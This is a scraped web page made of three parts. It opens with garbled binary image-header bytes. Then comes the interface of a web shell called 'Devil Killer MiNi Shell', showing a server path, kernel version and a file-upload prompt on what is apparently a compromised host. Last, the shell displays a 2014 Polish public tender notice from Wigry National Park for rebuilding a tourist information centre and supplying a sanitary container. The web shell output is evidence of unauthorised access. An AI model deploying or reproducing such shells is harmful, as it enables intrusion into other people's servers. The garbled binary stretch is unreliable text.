JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20140821/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20140821/179371-N-2014.html

<p class="kh_header"><b>Suwałki: Modernizacja CIT i budowa kontenera sanitarnego w miejscowości Krzywe</b><br>
<b>Numer ogłoszenia: 179371 - 2014; data zamieszczenia: 21.08.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wigierski Park Narodowy , Krzywe 82, 16-400 Suwałki, woj. podlaskie, tel. 87 5666322, faks 87 5632541.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wigry.win.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Ochrona Środowiska.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja CIT i budowa kontenera sanitarnego w miejscowości Krzywe.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przebudowa i rozbudowa pomieszczeń Centrum Informacji Turystycznej CIT o powierzchni 54 m2 Rozbiórka istniejących ścianek działowych, posadzek i okładzin ściennych z glazury.Budowa wiatrołapu o powierzchni   wraz ze schodami i spocznikiem. Konstrukcja ścian tradycyjna na fundamencie z bloczków betonowych wzmocniona żelbetowym szkieletem słupy i wieńce. Posadzka wewnątrz wiatrołapu z płytek gres szkliwiony, rektyfikowany 59,7 x 59,7 cm. Posadzka na schodach i spoczniku z płyt kamiennych płomieniowanych gr. 3 cm kolor szary. Pokrycie dachu  blacha powlekana panel na rąbek stojący, kolor grafit. Lico ścian zewnętrznych i wewnętrznych , pokryte tynkiem mineralnym z odciśniętym wzorem imitującym słoje drewna. Dostawa i montaż stolarki aluminiowej   Wykonanie ścianek działowych i obudów ścian z płyt gipsowo-kartonowych na rusztach stalowych  . Oczyszczenie, naprawa, uzupełnienie oraz nałożenie gładzi gipsowych i wymalowanie tynków ścian i sufitów     Wykonanie okładzin podłogowych pomieszczenia CIT z płytek gres szkliwiony, rektyfikowany o strukturze natura kolor beż wym. 59,7 x 59,7 cm  oraz gres o strukturze drewna w kolorze orzech i wymiarach 60 x 17, 5 cm.   Wykonanie okładzin posadzki pomieszczenia do serwisowania rowerów    gres techniczny wymiary płytek 33 x 33 lub 35 x 35 cm. z tolerancją 2 cm.Montaż okładzin ściennych z płyty wiórowej laminowanej okleiną HPL  oraz z paneli dekoracyjnych pure z drewna naturalnego o wym. 76 x38x 3 cm. . Wymiana 3 sztuk podokienników. Wykonanie nowej instalacji elektrycznej gniazd wtykowych i oświetlenia wraz z przewieszeniem istniejących opraw i dowieszeniem nowych CIT i  pomieszczenie do serwisowania rowerów. Wykonanie instalacji teleinformatycznej w tym sieć telefoniczna 4 gniazda i komputerowa, logiczna i zasilająca 230 V wraz z dedykowanymi gniazdami do podłączenia 7 sztuk. komputerów. Dostawa elementów wyposażenia i zabudowy pomieszczenia CIT  z płyty wiórowej laminowanej okleiną HPL w kolorach molina jesion piaskowy i molina jesion brązowy w tym zabudowa ściany w formie szafy z półkami na akta z drzwiami oklejonymi folią winylową z nadrukowanym zdjęciem wielkoformatowym,  zabudowa lady recepcyjnej  z trzema stanowiskami pracy, dwa biurka, dwa stoły, komoda stojąca, ława, regał, zabudowa aneksu kuchennego, szafka stojąca  z blatem roboczym i wbudowanym zlewozmywakiem ze stali nierdzewnej i baterią zlewozmywakową i szafki wiszące. W zabudowie należy wydzielić miejsce na lodówkę i kuchenkę mikrofalową. W ramach zamówienia Wykonawca dostarczy i wbuduje w zabudowę lodówkę i kuchenkę mikrofalową. Wszystkie meble z płyty laminowanej wykonać zgodnie z projektem aranżacji wnętrza. Dostawa 2 sztuk krzeseł dla turystów i 5 sztuk foteli obrotowych. Dostawa i montaż wydruku mapy parku w ramie, loga WPN, tablicy korkowej w ramie, szklanej witryny identycznej z istniejącymi już w pomieszczeniu, wieszaków na foldery z przezroczystego tworzywa na aluminiowym stelażu, rolet okiennych tkaninowych rolety rzymskie.Dostawa elementów wyposażenia pomieszczenia do serwisowania rowerów  stół warsztatowy  z kątownika stalowego z blatem roboczym i blatem pomocniczym z twardego drewna liściastego. Elementy stalowe ocynkowane  i malowane proszkowo. Stalowy stojak na 3 rowery. Konstrukcja ze stali ocynkowanej malowanej proszkowo. Centrownica do kół rowerowych profesjonalna. Urządzenie wykonane ze stali konstrukcyjnej przeznaczone do obsługi kół o średnicy od 16 do 29 cali z lub bez opony. Stojak rowerowy serwisowy. Wykonany z zastosowaniem elementów aluminiowych ze stalowymi łącznikami. Obrotowy w pełnym zakresie. Wysokość regulowana płynnie.  Szczegółowy opis wymagań materiałowych, jakościowych oraz wymiary i ilość poszczególnych elementów wyposażenia wnętrza zawierają SIWZ. dokumentacja projektowa w tym projekt aranżacji wnętrza oraz specyfikacje techniczne wykonania i odbioru robót oraz przedmiary. Wymiana kontenera sanitarnego. Demontaż i przewiezienie we wskazane przez Zamawiającego miejsce istniejącego kontenera sanitarnego. Wykonanie żelbetowych stóp fundamentowych o wysokości 80 cm i podstawie 40 x 40 cm. Wykonanie podziemnych przyłączy wod-kan dł. 1,5 m i energetycznego dł. 54 mb kabel YKYżo 5 x10 mm2. Przyłącza zalicznikowe nie wymagające uzgodnień z właścicielami sieci wod-kan i elektrycznej. Dostawa i instalacja na gotowych stopach fundamentowych kompletnego kontenera sanitarnego z dwiema kabinami w tym jedna przystosowana dla potrzeb osób niepełnosprawnych. Budynek na planie prostokąta 2.50 x 4.80 m. Konstrukcja szkielet stalowy samonośny z profili zamkniętych + kątowniki, ceowniki.  Ściany zewnętrzne płyta warstwowa o profilu elewacyjnym z rdzeniem styropianowym o gr. 100 mm, na zewnątrz i wewnątrz blacha stalowa o gr. 0,55 mm w powłoce ochronnej. Drzwi pełne stalowe  okna z PCV  rozwierno uchylne.  Podłoga, konstrukcja z kształtowników ze stali S235JR, zimno giętych gr. 4mm, spawanych, zabezpieczonych antykorozyjnie; izolacja styropian gr. 10cm warstwy podłogi blacha ocynkowana T14 gr. 0,5mm, folia paroizolacyjna, płyta OSB 3 gr. 2,2 cm, wykładzina podłogowa z tworzywa sztucznego PCV gr. 2,0mm. Stropodach płyta warstwowa o profilu dachowym T35 z rdzeniem styropianowym o gr. 100 mm  na zewnątrz i wewnątrz blacha stalowa o gr. 0,55 mm. Ze względów estetycznych kontener wyposażyć w dwuspadowy dach o kącie nachylenia głównych połaci 35o. Konstrukcja z profili zamkniętych ze stali S235JR 40 x 80 mm, zimno giętych gr. 3 mm. Pokrycie dachu blacha płaska kolor grafitowy na rąbek stojący na deskowaniu pełnym, obróbki blacharskie, rynny i rury spustowe z blachy powlekanej w kolorze dachu. Przed wejściem do budynku wykonać pochylnię z kostki betonowej polbruk dla osób niepełnosprawnych ruchowo, o spadku 6% i spoczniku 1.50 x 1.50 m. Kontener musi być fabrycznie wyposażony we wszelkie niezbędne instalacje tj. wod-kan 2 x WC kompakt z odpływem dolnym, 2 x umywalka z baterią umywalkową, 2 x przepływowy ogrzewacz wody, 1x komplet uchwytów dla niepełnosprawnych  i elektryczną  oświetleniową wraz z oprawami w każdym pomieszczeniu i jedną zewnętrzną z czujnikiem ruchu, wyłączniki nawierzchniowe hermetyczne, gniazd wtykowych 2 x gniazdo wtykowe nawierzchniowe hermetyczne, wyłącznik różnicowoprądowy, wyłączniki nadprądowe, 2 x grzejnik elektryczny.  Szczegółowy opis przedmiotu zamówienia zawierają dołączone do niniejszej SIWZ dokumentacja projektowa, przedmiary i stwiorb. Zamawiający wymaga udzielenia w ramach ceny ofertowej gwarancji na okres minimum 5 lat na meble wykonane z płyty wiórowej okleinowanej laminatem HPL i 3 lata na roboty budowlane oraz pozostałe elementy wyposażenia. Wszelkie usterki stwierdzone w ramach przeglądów rocznych oraz zgłaszane przez zamawiającego w trakcie normalnego użytkowania Wykonawca zobowiązuje się usunąć w terminie 7 dni od daty otrzymania wiadomości o ich zaistnieniu..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówienia uzupełniającego w postaci doposażenia sanitariatu kontenerowego w 2 szt. ogniw fotowoltaicznych wraz z oprzyrządowaniem do  przygotowania ciepłej wody użytkowej grzałka i zasobnik 100 l</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.40.00.00-1, 45.45.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie określono</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie określono</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie określono</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W tym celu należy udokumentować że wykonawca dysponuje lub będzie dysponował minimum jedną osobą z uprawnieniami do sprawowania samodzielnych funkcji technicznych w budownictwie w specjalności konstrukcyjno - budowlanej. W przypadku obywateli państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej muszą oni spełniać wymogi określone w art. 12a ustawy Prawo Budowlane, z których wynika, że samodzielne funkcje techniczne w budownictwie mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie określono</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Jeżeli wykonawca, wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, zamawiający, w celu oceny, czy wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów żąda dołączenia do oferty dokumentów określających zakres dostępnych wykonawcy zasobów innego podmiotu,sposób wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia,charakter stosunku, jaki będzie łączył wykonawcę z innym podmiotem,zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia. Wykonawca dołączy pisemne w oryginale lub kopii poświadczonej notarialnie zobowiązania tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia W przypadku składania oferty wspólnej przez kilka podmiotów np. konsorcja w ofercie należy wskazać lidera lub reprezentanta grupy upoważnionego do kontaktów z zamawiającym i dołączyć oryginał  lub kopię poświadczoną notarialnie upoważnienia pełnomocnictwa podpisany przez upoważnionych reprezentantów firm składających ofertę wspólną. Każdy z wykonawców składających ofertę wspólną zobowiązany jest złożyć Oświadczenie o braku podstaw do wykluczenia Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert Aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, Listę kapitałową informację o nie przynależności do grupy kapitałowej, w oryginale lub kopii poświadczonej notarialnie  Pozostałe dokumenty składane na potwierdzenie spełniania warunków wykonawcy składający ofertę wspólnie składają wspólnie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wigry.win.pl/bip/index.htm<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wigierski Park Narodowy Krzywe 82 16-402 Suwałki..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.09.2014 godzina 09:00, miejsce: Wigierski Park Narodowy Krzywe 82 16-402 Suwałki..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedsięwzięcie jest realizowane z ramach projektu nr POIS.05.01.00-00-437.12 Ograniczenie presji turystycznej na cennych przyrodniczo obszarach Wigierskiego Parku Narodowego współfinansowanego przez Unię Europejską w ramach Programu Operacyjnego Infrastruktura i Środowisko V oś priorytetowa: Ochrona przyrody i kształtowanie postaw ekologicznych: Działanie 5.1.3 Budowa lub modernizacja małej infrastruktury służącej zabezpieczeniu obszarów chronionych przed nadmierną i niekontrolowaną presją turystów . Zadanie: II Realizacja przedsięwzięcia Pkt. II.2. Budowa infrastruktury w Krzywem Ppkt.II.2.1 Modernizacja Centrum Informacji Turystycznej usunięcie ścianek działowych, wymiana mebli...;1 sztPpkt.II.2.2 Wymiana sanitariatu. utylizacja starego i zakup nowego kontenera 1 szt Projekt jest współfinansowany przez NFOŚ i GW w Warszawie...</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przebudowa i rozbudowa pomieszczeń CIT..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przebudowa i rozbudowa pomieszczeń Centrum Informacji Turystycznej CIT o powierzchni 54 m2 Rozbiórka istniejących ścianek działowych, posadzek i okładzin ściennych z glazury.Budowa wiatrołapu o powierzchni wraz ze schodami i spocznikiem. Konstrukcja ścian tradycyjna na fundamencie z bloczków betonowych wzmocniona żelbetowym szkieletem słupy i wieńce. Posadzka wewnątrz wiatrołapu z płytek gres szkliwiony, rektyfikowany 59,7 x 59,7 cm. Posadzka na schodach i spoczniku z płyt kamiennych płomieniowanych gr. 3 cm kolor szary. Pokrycie dachu blacha powlekana panel na rąbek stojący, kolor grafit. Lico ścian zewnętrznych i wewnętrznych , pokryte tynkiem mineralnym z odciśniętym wzorem imitującym słoje drewna. Dostawa i montaż stolarki aluminiowej Wykonanie ścianek działowych i obudów ścian z płyt gipsowo-kartonowych na rusztach stalowych . Oczyszczenie, naprawa, uzupełnienie oraz nałożenie gładzi gipsowych i wymalowanie tynków ścian i sufitów Wykonanie okładzin podłogowych pomieszczenia CIT z płytek gres szkliwiony, rektyfikowany o strukturze natura kolor beż wym. 59,7 x 59,7 cm oraz gres o strukturze drewna w kolorze orzech i wymiarach 60 x 17, 5 cm. Wykonanie okładzin posadzki pomieszczenia do serwisowania rowerów gres techniczny wymiary płytek 33 x 33 lub 35 x 35 cm. z tolerancją 2 cm.Montaż okładzin ściennych z płyty wiórowej laminowanej okleiną HPL oraz z paneli dekoracyjnych pure z drewna naturalnego o wym. 76 x38x 3 cm. . Wymiana 3 sztuk podokienników. Wykonanie nowej instalacji elektrycznej gniazd wtykowych i oświetlenia wraz z przewieszeniem istniejących opraw i dowieszeniem nowych CIT i pomieszczenie do serwisowania rowerów. Wykonanie instalacji teleinformatycznej w tym sieć telefoniczna 4 gniazda i komputerowa, logiczna i zasilająca 230 V wraz z dedykowanymi gniazdami do podłączenia 7 sztuk. komputerów. Dostawa elementów wyposażenia i zabudowy pomieszczenia CIT z płyty wiórowej laminowanej okleiną HPL w kolorach molina jesion piaskowy i molina jesion brązowy w tym zabudowa ściany w formie szafy z półkami na akta z drzwiami oklejonymi folią winylową z nadrukowanym zdjęciem wielkoformatowym, zabudowa lady recepcyjnej z trzema stanowiskami pracy, dwa biurka, dwa stoły, komoda stojąca, ława, regał, zabudowa aneksu kuchennego, szafka stojąca z blatem roboczym i wbudowanym zlewozmywakiem ze stali nierdzewnej i baterią zlewozmywakową i szafki wiszące. W zabudowie należy wydzielić miejsce na lodówkę i kuchenkę mikrofalową. W ramach zamówienia Wykonawca dostarczy i wbuduje w zabudowę lodówkę i kuchenkę mikrofalową. Wszystkie meble z płyty laminowanej wykonać zgodnie z projektem aranżacji wnętrza. Dostawa 2 sztuk krzeseł dla turystów i 5 sztuk foteli obrotowych. Dostawa i montaż wydruku mapy parku w ramie, loga WPN, tablicy korkowej w ramie, szklanej witryny identycznej z istniejącymi już w pomieszczeniu, wieszaków na foldery z przezroczystego tworzywa na aluminiowym stelażu, rolet okiennych tkaninowych rolety rzymskie.Dostawa elementów wyposażenia pomieszczenia do serwisowania rowerów stół warsztatowy z kątownika stalowego z blatem roboczym i blatem pomocniczym z twardego drewna liściastego. Elementy stalowe ocynkowane i malowane proszkowo. Stalowy stojak na 3 rowery. Konstrukcja ze stali ocynkowanej malowanej proszkowo. Centrownica do kół rowerowych profesjonalna. Urządzenie wykonane ze stali konstrukcyjnej przeznaczone do obsługi kół o średnicy od 16 do 